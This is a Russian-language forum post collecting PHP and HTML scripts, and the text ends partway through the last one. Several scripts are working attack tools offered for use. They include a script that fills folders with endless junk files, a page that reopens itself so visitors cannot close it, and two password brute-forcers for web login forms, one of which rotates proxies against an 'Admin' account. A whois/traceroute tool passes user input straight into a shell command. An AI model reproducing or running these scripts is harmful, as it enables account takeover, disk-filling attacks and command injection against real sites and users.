Здраствуйте, в этом топике я буду публиковать полезные скрипты которые я найду на просторах интернет. Вы также можете публиковать скрипты которые найдете в сети.
Поехали!
Скрипт "Срачник". Засоряет все папки файлами.
Данный скрипт проверяет на наличие сервисов POP, FTP и т.д
Не дает закрвать окно.
(пример простой, часто используется на порносайтах и всяких подставах =))
БрутФорс Форм, настраивается практически под любую форму(ы).
Чекер проксиков, так же проверяет прокси и на анонимность
Это PHP скрипт, который включает следующи утилиты: whois, finger, и traceroute.
Скрипт отображает количество людей просматривающих страницу:
Легкая программа с визуальным оформлением для:
- преобразования в md5,sha1 хэши
- Определения длины строки
- Кодирования и декодирования в base64
- Кодирование и декодирование строки URL
- Для отсылки HTTP запроса и получение информации
Небольшой, удобный брут на PHP
Плюсы и небольшие минусы брута:
[+] Быстрая работа
[+] Поддержка прокси, к тому же они хранятся в txt-файле
[-] Нету граба прокси, но это не проблема - писать минут 5
Сейчас я вам покажу пример брута по логину -
Наш логин: Admin
Форма для входа: http://сайт.ру/services/?login=тут_логин&password=тут_пароль
PHP-Код:
Не ленимся настраивать скриптик
Хостинг картинок на PHP. (Спасибо Anthony Ryabov за авторизацию, а за js-споилер - krypt3r )
Код:
Нужно только поместить скрипт в папку на хостинге, указать url до папки со скриптом, указать логин и пароль для авторизации, включить/выключить авторизацию (на ваше усмотрение) и можно использовать (читайте первые комментарии в скрипте)
P.S. Скрипт сам создаёт папку "upload", с правами доступа "0777".
Поехали!
Скрипт "Срачник". Засоряет все папки файлами.
PHP:
<?php
// Greetz всем заподлянщикам...
//Аминь...
//(C) Dr.Check
////////////////////////////////////////////////////////////////
set_time_limit(0);
ignore_user_abort();
echo("<center><b>ИБО НЕХУЙ!!!</b></center>");
/////////////////////////////////////////////////////////////////
$name = array('a','b','c','d','e','f','g','h','i','j','k', 'l','m','n','o','p','r','s',
't','u','v','x','y','z','A','B','C','D','E','F','G ','H','I','J','K','L',
'M','N','O','P','R','S','T','U','V','X','Y','Z','1 ','2','3','4','5','6',
'7','8','9','0');
//////////////////////////////////////////////////////////////////
$rash= array('.txt','.dic','.doc','.xls','.exe','.ini',
'.bat','.log','.dll','.hak','.wmf','.zip','.rar',
'.tar','.gz','.jpg','.gif','.bmp');
/////////////////////////////////////////////////////////////////
while(true) {
$perem = "";
$fuck="";
for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла.
{
$by = rand(0, count($name) - 1);
$perem .= $name[$by];
}
$ra= rand(0, count($rash)-1);
$fuck .= $rash[$ra];
$fp=fopen($perem.$fuck,"w");
fwrite($fp,php_uname());
fclose($fp);
}
?>Данный скрипт проверяет на наличие сервисов POP, FTP и т.д
PHP:
<html>
<head>
<title>::CHECKER::</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<body bgcolor="#000000" text="#ffffff">
<hr width="30%"></hr><center><table border="1pt"><tr><td bgcolor="#90EE90"><center><font color="black"><b>| Введите имя сервера |</b></font></center></td></tr>
<tr><td><form action="<? $PHP_SELF ?>" method="post">
<b>NAME:</b> <input type="text" name="domain"></td></tr><tr><td><input type="submit" value="Проверить">
<button onclick=location.reload(true)>Обновить</button></td></tr></table>
<hr width="30%"></hr>
<?php
error_reporting(0);
set_time_limit(0);
$domain=$_POST['domain'];
$ip=gethostbyname($domain);
$httpport = "80";
$ftpport = "21";
$popport = "110";
$imapport = "143";
$smtpport = "25";
$sshport = "22";
echo "<b>"; echo("IP адрес хоста: "); echo "</b>";
echo "<font color=\"red\">"; echo($ip); echo "</font>"
?>
<table border="1pt"><tr><td bgcolor="#90EE90"><center><font color="black"><b>| Результаты проверки |</b></font></center></td></tr>
<tr><td><font color="#999999"><b>HTTP --> </b></font>
<?php
$http = fsockopen($domain, $httpport, $errno, $errstr, $timeout);
if (!$http)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?></td></tr>
<tr><td><font color="#999999"><b>FTP --> </b></font>
<?php
$ftp = fsockopen($domain, $ftpport, $errno, $errstr, $timeout);
if (!$ftp)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?></td></tr>
<tr><td><font color="#999999"><b>POP --> </b></font>
<?php
$pop = fsockopen($domain, $popport, $errno, $errstr, $timeout);
if (!$pop)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr>
<tr><td><font color="#999999"><b>IMAP --> </b></font>
<?php
$imap = fsockopen($domain, $imapport, $errno, $errstr, $timeout);
if (!$imap)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr>
<tr><td><font color="#999999"><b>SMTP --> </b></font>
<?php
$smtp = fsockopen($domain, $smtpport, $errno, $errstr, $timeout);
if (!$smtp)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr>
<tr><td><b><font color="#999999">SSH --> </font></b>
<?php
$ssh = fsockopen($domain, $sshport, $errno, $errstr, $timeout);
if (!$ssh)
{
echo ("<font color=\"red\"><b>\"DEACTIVATED\"</b></font>");
}
else
{
echo ("<font color=\"green\"><b>\"ACTIVATED\"</b></font>");
}
?>
</td></tr></table><hr width="30%"></hr></center>
</body>
</head>
</html>Не дает закрвать окно.
(пример простой, часто используется на порносайтах и всяких подставах =))
HTML:
<html>
<head>
<title>Press ALT+F4</title>
</head>
<body onunload="goodBye()">
<p align="center">
<b>Yuo can't close your browser window</b>
</p>
<script language="JavaScript">
<!--
function goodBye()
{window.open("Cantclose.htm");}
//-->
</script>
<p align="center">
<b>Try Alt+F4!</b>
</p>
</body>
</html>БрутФорс Форм, настраивается практически под любую форму(ы).
PHP:
<?################Брутфорс Форм##################
///////////////////////----(c) nc.STRIEM----//////////////////////////
$filepas="file.txt" ; ///файл с данными для брута
$filegood="good.txt"; ///файл с подходящими паролями
$endifg=1; ///закончить при первом же найденом 1-да 0-нет
$iskl=array();
//////строки которых не должно быть в правельных страницах/////////
$iskl[0]="Неверный пароль";
//$iskl[1]="Неверная длина пароля!";
//$iskl[2]="ERROR";
//$iskl[3]="Ошибка";
//////////////////////////////////////////////////////////////////
$host="localhost"; ///хост
$script="/form.php"; ///скрипт
///////////////////////////////////////////////Передоваемый Header ///////////////////////////////////////////////////////
$header="POST http://$host$script HTTP/1.0\r\n";
$header.= "Host: $host\r\n";
$header.= "Content-Type: application/x-www-form-urlencoded\r\n";
//////Не обязательные параметры! но не всегда///
//$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n";
//$header.="Accept-Language: ru\r\n";
//$header.= "Proxy-Connection: Keep-Alive\r\n";
//$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n";
//$header.="Referer: http://microsoft.com\r\n";
//$header.="Cookie: CREATED=nc.STRIEM\r\n";
####################################Сам брут#####################################
set_time_limit(0);
$fo=fopen($filepas,"r");
$kolvoporolei=0;
$timestart=time('U');
$fgo=fopen($filegood,"a");
echo "<h3><center>Мы брутили http://$host$script</center></h3>";
while(!feof($fo))
{/////////////////////////////////////////////
$fp = fsockopen("www.".$host, 80, $errno, $errstr, 30);
if (!$fp)
echo "$errstr ($errno)<br />\n";
else
{
$kolvoporolei++;
$dan=rtrim(fgets($fo)); /////берем данные из файла
$dannii=split(';',$dan);
$out=$header;
$zapr="login=$dannii[0]&password=$dannii[1]"; ////имена переменных и их значения сюда
$contleng=strlen($zapr);
$out.= "Content-Length: $contleng\r\n";
$out.= "Pragma: no-cache\r\n\r\n";
$out.= "$zapr\r\n\r\n";
fwrite($fp, $out);
$conte="";
while (!feof($fp))
$conte.=fgets($fp);
$est=1;
for($i=0;$i<sizeof($iskl);$i++)
if(strstr($conte, $iskl[$i]))
{
$est=0;
break;
}
/////может понадобиться при настройки///
//echo htmlspecialchars($conte); break;
/////////////////////////////////
if($est)
{
fwrite($fgo,$dannii[0].";".$dannii[1]."\n");
echo "<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>";
if($endifg)
break;
}
fclose($fp);
}
}//////////////////////////////////////////////////////////////////////////////////////////
fclose($fgo);
$time=time('U')-$timestart;
echo "<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>[email protected]</tt></center></h4>";
?>Чекер проксиков, так же проверяет прокси и на анонимность
PHP:
<?
/************************************************** **************
* *
* *
* This will perform a basic connectivity and anonymity test *
* *
* Simply upload to a php enabled webserver and change the *
* configurable parameters below if you so desire *
* *
* 2005-11-11 v0.1 - Compatible with Charon v0.5.3.5 *
************************************************** **************/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>Online proxy tester</title></head>
<body bgcolor="black" text="white">
<?php
// Ensure that the timeouts from fsockopen don't get reported as errors (possible, depends on the php server config)
error_reporting(0);
// Limit the amount of proxies that can be tested at any one time
$maximum_proxies_to_test = 5;
// Enter a password (if required) to protect the page
$password = '';
// Actual proxyjudge part of the page
function return_env_variables()
{
echo '<pre>'."\n";
foreach ($_SERVER as $header => $value )
{
if ((strpos($header , 'REMOTE')!== false || strpos($header , 'HTTP')!== false || strpos($header , 'REQUEST')!== false) && ( strpos($header , 'HTTP_HOST') !== 0))
{
echo $header.' = '.$value."\n";
}
}
echo '</pre>';
}
// Function to go away and get the page (calls through the proxy back to itself)
function get_judge_page($proxy)
{
// Depending on the server environment, this timeout setting may not be available.
$timeout = 15;
$proxy_cont = '';
list($proxy_host, $proxy_port) = explode(":", $proxy);
$proxy_fp = fsockopen($proxy_host, $proxy_port, $errornumber, $errorstring, $timeout);
if ($proxy_fp)
{
stream_set_timeout($proxy_fp, $timeout);
fputs($proxy_fp, "GET " . $_SERVER['SCRIPT_NAME'] . "?test HTTP/1.0\r\nHost: " . $_SERVER['SERVER_NAME'] . "\r\n\r\n");
while(!feof($proxy_fp))
{
$proxy_cont .= fread($proxy_fp,4096);
}
fclose($proxy_fp);
$proxy_cont = substr($proxy_cont, strpos($proxy_cont,"\r\n\r\n")+4);
}
return $proxy_cont;
}
// Check for the control string to see if it's a valid fetch of the judge
function check_valid_judge_response($page)
{
if(strlen($page) < 5)
return false;
return strpos($page, 'REMOTE_ADDR') !== false;
}
// Check for the IP addresses
function check_anonymity($page)
{
if(strpos($page, $_SERVER['LOCAL_ADDR']) !== false)
return false;
return true;
}
// Takes and tests a proxy
// 0 - Bad proxy
// 1 - Good (non anon) proxy
// 2 - Good (anonymous) proxy
function test_proxy($proxy)
{
$page = get_judge_page($proxy);
if(!check_valid_judge_response($page))
return 0;
if(!check_anonymity($page))
return 1;
return 2;
}
////////// Main Page ////////////
// If this is a judge request, just return the environmental variables
if(getenv('QUERY_STRING') == "test")
{
return_env_variables();
}
// Else check whether we have been passed a list of proxies to test or not
// Should really use $_POST but it's been left as $HTTP_POST_VARS for older versions of php (3.x)
elseif( (isset($HTTP_POST_VARS['action']) && $HTTP_POST_VARS['action'] === 'fred') &&
(isset($HTTP_POST_VARS['proxies']) && $HTTP_POST_VARS['proxies'] != '') &&
( (strlen($password) == 0) || (isset($HTTP_POST_VARS['password']) && $HTTP_POST_VARS['password'] === $password) ))
{
$proxies = explode("\n", str_replace("\r", "", $HTTP_POST_VARS['proxies']), $maximum_proxies_to_test + 1);
// Set the overall time limit for the page execution to 10 mins
set_time_limit(600);
// Set up some arrays to hold the results
$anon_proxies = array();
$nonanon_proxies = array();
$bad_proxies = array();
// Loop through and test the proxies
for($thisproxy = 0; $thisproxy < ($maximum_proxies_to_test > count($proxies) ? count($proxies) : $maximum_proxies_to_test); $thisproxy += 1)
{
echo 'Testing ' . $proxies[$thisproxy] . ' .....';
flush();
switch(test_proxy($proxies[$thisproxy]))
{
case 2:
echo '.. Anon<br>' . "\n";
$anon_proxies[count($anon_proxies)] = $proxies[$thisproxy];
break;
case 1:
echo '.. Non anon<br>' . "\n";
$nonanon_proxies[count($nonanon_proxies)] = $proxies[$thisproxy];
break;
case 0:
echo '.. Dead<br>' . "\n";
$bad_proxies[count($bad_proxies)] = $proxies[$thisproxy];
break;
}
}
echo '<pre>';
echo '<br><b>Anonymous proxies</b>' . "\n";
for($thisproxy = 0; $thisproxy < count($anon_proxies); $thisproxy += 1)
echo $anon_proxies[$thisproxy] . "\n";
echo '<br><b>Non-anonymous proxies</b>' . "\n";
for($thisproxy = 0; $thisproxy < count($nonanon_proxies); $thisproxy += 1)
echo $nonanon_proxies[$thisproxy] . "\n";
echo '<br><b>Dead proxies</b>' . "\n";
for($thisproxy = 0; $thisproxy < count($bad_proxies); $thisproxy += 1)
echo $bad_proxies[$thisproxy] . "\n";
echo '</pre>';
}
// Just a blank call of the page - show the form for the user to fill in
else
{
echo '<h2>Online Proxy checker</h2>' . "\n";
echo '<h4>(http://' . $_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME'] . ')</h4>' . "\n";
echo 'Enter up to a maximum of ' . $maximum_proxies_to_test . ' prox' . ($maximum_proxies_to_test == 1 ? 'y' : 'ies') . ' to test' . "\n";
echo '<form method="POST" action="' . $_SERVER['SCRIPT_NAME'] . '">' . "\n";
echo '<input type="hidden" name="action" value="fred">' . "\n";
echo '<textarea name="proxies" cols=35 rows=' . $maximum_proxies_to_test . '></textarea><br>' . "\n";
if(strlen($password) > 0)
echo 'Password: <input type="password" name="password" size="15"><br>' . "\n";
echo '<input type="submit" value="Check proxies">' . "\n";
echo '</form>' . "\n";
}
?>
</body>
</html>Это PHP скрипт, который включает следующи утилиты: whois, finger, и traceroute.
PHP:
<?PHP
// whois(hostname [,username, [port]])
Function whois ($a_server, $a_query="", $a_port=43) {
$sock = fsockopen($a_server, $a_port, &$errno, &$errstr, 10);
if (!$sock)
{
echo "$errstr ($errno)<BR>\n";
} else {
fputs($sock, "$a_query\r\n");
while(!feof($sock))
{
$buf = fgets($sock,128);
if (ereg( "Whois Server:", $buf))
{
$a_server = str_replace( "Whois Server: ", "", $buf);
$a_server = trim($a_server);
}
}
fclose($sock);
if ($a_server)
{
print "<B>$a_query is registered at $a_server:</B><BR>";
$sock = fsockopen($a_server, 43, &$errno, &$errstr, 10);
if(!$sock)
{
echo "Could not open connection to $a_server on port
$a_port.\n";
echo "$errstr ($errno)<BR>\n";
} else {
fputs($sock, "$a_query\r\n");
while(!feof($sock))
{
echo fgets($sock,128);
}
fclose($sock);
}
} else {
echo "<b>$a_query was not found.</b><BR>";
}
}
}
// finger(hostname [,username, [port]])
Function finger ($a_server, $a_query="", $a_port=79) {
$sock=fsockopen($a_server,$a_port, &$errno, &$errstr, 10);
if (!$sock)
{
$ret_str = "$errstr ($errno)<BR>\n";
} else {
fputs($sock,"$a_query\n");
while (!feof($sock)) { $ret_str .= fgets($sock,128); }
fclose($sock);
}
echo $ret_str;
return $ret_str;
}
// traceroute(hostname)
Function traceroute ($a_query) {
exec("traceroute $a_query",$ret_strs);
$str_count = count($ret_strs);
for ($count=0; $count < $str_count; $count++)
print "$count/$str_count".$ret_strs[$count]."\n";
}
// -----------------------------------------------------------
$app_name = "PHP Net Toolpack";
$app_version = "0.1";
$TOOLS = array(
"finger" => "Finger",
"traceroute" => "Traceroute",
"whois" => "Whois?"
);
// when included inside <select name="tool"> on a html file ..
if ($tool=="listtools")
{
while (list($key, $val) = each($TOOLS)) {
print " <OPTION VALUE=\"".$key."\">".$val."</OPTION>\n";
}
exit;
}
// print appropriate html header
print "<HTML>";
if ($tool)
{
print "<HEAD><TITLE>".$tool." for ".$query."</TITLE></HEAD>\n";
print "<BODY>\n<H3>".$tool." for ".$query." ..</H3>\n";
} else {
print "<HEAD><TITLE>".$app_name."</TITLE></HEAD>\n";
print "<BODY>\n<H3>".$app_name."</H3>\n";
}
// check what tool they want to use and do what is necessary
switch($tool) {
case "finger":
if ($query)
{
print "<PRE>\n";
finger($server, $query);
print "</PRE>";
} else {
?>
<FORM ACTION="<?PHP echo($PHP_SELF. "?tool=".$tool); ?>" METHOD="post">
Server : <INPUT TYPE="text" NAME="server" VALUE="localhost"> <BR>
Query : <INPUT TYPE="text" NAME="query" SIZE="40" MAXLENGTH="100"> <BR>
<INPUT TYPE="submit" VALUE="Finger">
</FORM>
<?PHP
}
break;
case "traceroute":
if ($query)
{
print "<PRE>\n";
traceroute($query);
print "</PRE>";
} else {
?>
<FORM ACTION="<?PHP echo($PHP_SELF. "?tool=".$tool); ?>" METHOD="post">
Query : <INPUT TYPE="text" NAME="query" SIZE="40" MAXLENGTH="100"> <BR>
<INPUT TYPE="submit" VALUE="Trace route">
</FORM>
<?PHP
}
break;
case "whois":
if ($query)
{
print "<PRE>\n";
whois($server,$query);
print "</PRE>";
} else {
?>
<!-- <UL>
To look up a NIC handle, host name, or registrant,
use one of the keywords below:<BR>
<LI>To search by NIC handle (or contact), type "handle WA3509"</LI><BR>
<LI>To search by name, type "name lastname, firstname" </LI><BR>
<LI>To search by company name, type "name The Sample Corporation" </LI><BR>
<LI>To search by domain name, type "example.com" </LI><BR>
<LI>To search by IP address, type "host 121.23.2.7" </LI><BR>
<LI>To search by host or nameserver name, type "host ns1.worldnic.com"
</LI><BR>
(examples are from networksolutions.com)
</UL> -->
<FORM ACTION="<?PHP echo($PHP_SELF. "?tool=".$tool); ?>" METHOD="post">
This will find .com, .org, and .net domains<BR>
Server : <INPUT TYPE="text" NAME="server" VALUE="rs.internic.net"> <BR>
Query : <INPUT TYPE="text" NAME="query" SIZE="40" MAXLENGTH="100"> <BR>
<INPUT TYPE="submit" VALUE="<?PHP echo $TOOLS[$tool]; ?>">
</FORM>
<?PHP
}
break;
default:
print "<UL>Currently supported tools are:\n";
while (list($key, $val) = each($TOOLS)) {
echo "<LI><A HREF=\"".$PHP_SELF."?tool=".$key."\">".$val."</A></LI>\n";
}
print "</UL>\n";
break;
}
print "\n<HR><SMALL>".$app_name." v".$app_version."</SMALL>\n";
print "<BODY>\n</HTML>";
?>Скрипт отображает количество людей просматривающих страницу:
PHP:
<?
$timelim=20; ///лимит времени в секундах допустимого бездействия пользоваеля
session_id("hfJKcbJssJ");
session_start();
$f=1;
if(!isset($_SESSION['kolvo']))
$_SESSION['kolvo']=0;
if($_SESSION['kolvo']>0)
{
for($i=0;$i<$_SESSION['kolvo'];$i++)
if($_SESSION['users']['ip'][$i]==$_SERVER['REMOTE_ADDR'])
{
$_SESSION['users']['date'][$i]=date('U');
$f=0;
break;
}
if($_SESSION['kolvo']>0)
for($i=0;$i<$_SESSION['kolvo'];$i++)
if(date('U')-$_SESSION['users']['date'][$i]>$timelim)
{ for($j=$i;$j<$_SESSION['kolvo']-1;$j++)
{
$_SESSION['users']['date'][$j]=$_SESSION['users']['date'][$j+1];
$_SESSION['users']['ip'][$j]=$_SESSION['users']['ip'][$j+1];
}
$_SESSION['kolvo']--;
}
}
if($f)
{
$_SESSION['users']['ip'][$_SESSION['kolvo']]=$_SERVER['REMOTE_ADDR'];
$_SESSION['users']['date'][$_SESSION['kolvo']]=date('U');
$_SESSION['kolvo']++;
}
echo "Рыл на странице: ".$_SESSION['kolvo'];
?>Легкая программа с визуальным оформлением для:
- преобразования в md5,sha1 хэши
- Определения длины строки
- Кодирования и декодирования в base64
- Кодирование и декодирование строки URL
- Для отсылки HTTP запроса и получение информации
PHP:
<?php
/*
?
? @name Cry Engine Web
? @author PATCH
? @copyright 2011 Cry Engine Web
? @version 0.1 Beta
? @web None
?
*/
//надстройка для формы
$index = 'hash.php';
echo
'<html>
<body>
<table align="center" width="80%" border="3">
<tr>';
$left_menu =
' <td width="25%">
<div align="center"><a href="?p=md5">md5 хэш</a></div>
<div align="center"><a href="?p=sha1">sha1 хэш</a></div>
<div align="center"><a href="?p=strlen">strlen (длина строки)</a></div>
<div align="center"><a href="?p=base64">Base 64</a></div>
<div align="center"><a href="?p=URLcode">URL code</a></div>
<div align="center"><a href="?p=Get_Header">Отослать HTTP запрос</a></div>
</td>';
if(!isset($_GET['p']))
{
echo $left_menu;
echo '<td width="75%"></td>';
}
if($_GET['p'] =='md5')
{
echo $left_menu;
echo
'<td align="center" width="75%">
<form action="'.$index.'?p=md5" method="post">
<textarea name="text" cols="60" rows="30">
</textarea>
<p><input name="go_md5" type="submit" value="преобразовать"></p>
</form>';
if($_GET['p'] =='md5' and isset($_POST['go_md5']))
{
$text = trim($_POST['text']);
$str = md5($text);
echo
'<p> MD5 Hash</p>
<br>'.$str;
}
echo '</td>';
}
if($_GET['p'] =='sha1')
{
echo $left_menu;
echo
'<td align="center" width="75%">
<form action="'.$index.'?p=sha1" method="post">
<textarea name="text" cols="60" rows="30">
</textarea>
<p><input name="go_sha1" type="submit" value="преобразовать"></p>
</form>';
if($_GET['p'] =='sha1' and isset($_POST['go_sha1']))
{
$text = trim($_POST['text']);
$str = sha1($text);
echo
'<p> sha1 Hash</p>
<br>'.$str;
}
echo '</td>';
}
if($_GET['p'] =='strlen')
{
echo $left_menu;
echo
'<td align="center" width="75%">
<form action="'.$index.'?p=strlen" method="post">
<textarea name="text" cols="60" rows="30">
</textarea>
<p><input name="go_strlen" type="submit" value="преобразовать"></p>
</form>';
if($_GET['p'] =='strlen' and isset($_POST['go_strlen']))
{
$text = trim($_POST['text']);
$str = strlen($text);
echo '
<p>Длина строки</p>
<br>'.$str;
}
echo '</td>';
}
if($_GET['p'] =='base64')
{
echo $left_menu;
echo
'<td align="center" width="75%">
<form action="'.$index.'?p=base64" method="post">
<textarea name="text" cols="60" rows="30">
</textarea>
<div><input name="type" type="radio" value="1">Кодировать в base64</div>
<div><input name="type" type="radio" value="2">Декодировать из base64</div>
<p><input name="go_base64" type="submit" value="преобразовать"></p>
</form>';
if($_GET['p'] =='base64' and isset($_POST['go_base64']) and $_POST['type']==1)
{
$text = trim($_POST['text']);
$str = base64_encode($text);
echo '
<p>base64 Encode</p>
<br>
<textarea name="text" cols="60" rows="30">'.$str.'</textarea>';
}
if($_GET['p'] =='base64' and isset($_POST['go_base64']) and $_POST['type']==2)
{
$text = trim($_POST['text']);
$str = base64_decode($text);
echo '
<p>base64 Decode</p>
<br>
<textarea name="text" cols="60" rows="30">'.$str.'</textarea>';
}
echo '</td>';
}
if($_GET['p'] =='URLcode')
{
echo $left_menu;
echo
'<td align="center" width="75%">
<form action="'.$index.'?p=URLcode" method="post">
<textarea name="text" cols="60" rows="30">
</textarea>
<div><input name="type" type="radio" value="1">Кодировать URL</div>
<div><input name="type" type="radio" value="2">Декодировать URL</div>
<p><input name="go_URLcode" type="submit" value="преобразовать"></p>
</form>';
if($_GET['p'] =='URLcode' and isset($_POST['go_URLcode']) and $_POST['type']==1)
{
$text = trim($_POST['text']);
$str = urlencode($text);
echo '
<p>URL Encode</p>
<br>
<textarea name="text" cols="60" rows="30">'.$str.'</textarea>';
}
if($_GET['p'] =='URLcode' and isset($_POST['go_URLcode']) and $_POST['type']==2)
{
$text = trim($_POST['text']);
$str = urldecode($text);
echo '
<p>URL decode</p>
<br>
<textarea name="text" cols="60" rows="30">'.$str.'</textarea>';
}
echo '</td>';
}
if($_GET['p'] =='Get_Header')
{
echo $left_menu;
echo
'<td align="center" width="75%">
<form action="'.$index.'?p=Get_Header" method="post">
<input name="text" type="text" size="100" maxlength="1000">
<p><input name="go_Get_Header" type="submit" value="Отослать"></p>
</form>';
if($_GET['p'] =='Get_Header' and isset($_POST['go_Get_Header']))
{
$text = trim($_POST['text']);
$str[''] = get_headers($text);
echo '
<p>запрос</p>
<br>';
foreach ($str[''] as $st)
{
echo $st.'<br>';
}
}
echo '</td>';
}
echo '
</tr>
</table>
</body>
</html>' ;
?>Небольшой, удобный брут на PHP
Плюсы и небольшие минусы брута:
[+] Быстрая работа
[+] Поддержка прокси, к тому же они хранятся в txt-файле
[-] Нету граба прокси, но это не проблема - писать минут 5
Сейчас я вам покажу пример брута по логину -
Наш логин: Admin
Форма для входа: http://сайт.ру/services/?login=тут_логин&password=тут_пароль
PHP-Код:
PHP:
<?php
echo "Брут завершен - посмотреть сбрученные пароли можно <a href='/good.txt' class='country_link'>здесь</a>, а несбрученные вот <a href='/bad.txt' class='country_link'>здесь</a>. Design by Vova93";
$handle = fopen("slovar.txt", "r"); //Файл с паролями
$email="Admin"; //Здесь указываем ник (кого брутим)
while (!feof($handle))
{
$p = preg_split('~[\r\n]~', file_get_contents('proxy.txt')); //файл с проксями
$proxy = $p[rand(0,sizeof($p)-1)];
$pass = fgets($handle, 1024);
$url = "http://сайт.ру/services/"; //Форма для входа
$post = "login=$email&password=$pass";
$cfile = 'text.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_PROXY, $proxy);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
if (strstr($result, 'Приветствуем тебя')) //Текст, который присутствует после авторизации, и отсутствует на не авторизованной странице
{
$h=fopen("good.txt", "a"); //Тут будут сбрученные пароли
fwrite($h, $email.";".$pass);
fclose($h);
}
else
{
$h=fopen("bad.txt", "a"); //Тут несбрученные пароли
fwrite($h, $email.";".$pass);
fclose($h);
}
}
?>Хостинг картинок на PHP. (Спасибо Anthony Ryabov за авторизацию, а за js-споилер - krypt3r )
Код:
PHP:
<?php
$url_do_papki = "http://site.domen/image-hosting/"; //Ваша ссылка до папки со скриптом. Не забудьте поставить слеш ("/") в конце!
$login="12345"; //Логин
$pass=md5("12345");//Пароль
$auth="1"; //Вкл/выкл авторизацию
$dir_true_false = is_dir('upload/');
if ($dir_true_false=='')
{
mkdir("upload/", 0777);
header("Location: ".$_SERVER['PHP_SELF']);
};
if(isset($_GET['img'])&&!empty($_GET['img']))
{
$images = array();
$images[bg]='R0lGODdhKAAoAKEDAAAkCAArCgA4Df///ywAAAAAKAAoAAAC2oxvEsoBDl9rqNq0snocznyF3xZ5GhiKJ9l Ja3qNZSfD8duan43Iubvj9XCzl0I1ESiXSoDACWVKjTIpMxq1K l9ULfap3Y6q4a8zzB17wVkttWs1h2vqOBuMHsOl8vypKAcgODh 4BwX442D4REi4mAj42FhohhhpNin4WHRpmBlo+SOZuZnTifVZO pMYmFppWse36Je0dzXrthN7+0WrQbbWm/u3u9Q3XFvchGuVtlLGPKWn/DjHdfORWCN04FO0LeSdA84tXkJuY05zzW0E6N6urvPX7q7NjlA AADs=';
@ob_clean();
header("Content-type: image/gif");
echo base64_decode($images[$_GET['img']]);
exit();
};
if(isset($_GET['style']))
{
echo '
input {
Font-Family: fantasy;
Font-size: 10px;
color: white; Border-color: white;
Border-style: solid;
Border-width: 1px;
BackGround-color: transparent;
}
#button {
BackGround-color: black;
}
a {
text-decoration: none;
}
a:link {
border-bottom: 1px dotted white;
color: #ffffff;
}
a:visited {
border-bottom: 1px dotted white;
color: #ffffff;
}
a:active {
border-bottom: 1px dotted #ffe5b4;
color: #ffe5b4;
}';
exit();
};
if (isset($_GET['in']))
{
$nlogin=$_POST['login'];
$npass=md5($_POST['pass']);
if ($nlogin == $login and $npass == $pass)
{
setcookie('login',"$nlogin",time()+10000000000);
setcookie('pass',"$npass",time()+10000000000);
header("Location:" .$_SERVER['PHP_SELF']);
}
else {header("Location:" .$_SERVER['PHP_SELF']);}
}
if($_COOKIE["login"] != "$login" or $_COOKIE["pass"] != "$pass"){
if($auth == "0"){setcookie("login", "$login", time()+10000); setcookie("pass", "$pass", time()+10000); echo "<script> document.location.replace('$SCRIPT_NAME'); </script>";}
echo "
<head>
<link rel='stylesheet' type='text/css' href='?style' />
<meta http-equiv='content-type' content='text/html; charset=utf-8' />
<title>Вход</title>
<link type=text/css rel=StyleSheet href=?style>
</head>
<body background=?img=bg>
<br><br><br><br>
<center>
<font color=white size=10 face=fantasy>
<form method=post action=?in>
<table style=text-align: left; width: 100px; border=0 cellpadding=2 cellspacing=2>
<tbody>
<tr>
<td><font size='4' face='fantasy' color='white'>Логин:</font></td>
<td><input name=login></td>
</tr>
<tr>
<td><font size='4' face='fantasy' color='white'>Пароль:</font></td>
<td><input name=pass type=password></td>
</tr>
<tr>
<td></td>
<td><input type=submit id=button value=Вход></td>
</tr>
</table>
</tbody>
</form>
</font>
</center>
</body>";
exit();
}
else
{
if(isset($_GET['upload'])) {
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
echo '<link rel="stylesheet" type="text/css" href="?style" />';
echo '<body background="?img=bg">';
echo '<font size="4" face="fantasy" color="white">';
$uploaddir = "/home/a9526880/public_html/mini-host/upload";
$arr = array('a','b','c','d','e','f',
'g','h','i','j','k','l',
'm','n','o','p','r','s',
't','u','v','x','y','z',
'A','B','C','D','E','F',
'G','H','I','J','K','L',
'M','N','O','P','R','S',
'T','U','V','X','Y','Z',
'1','2','3','4','5','6',
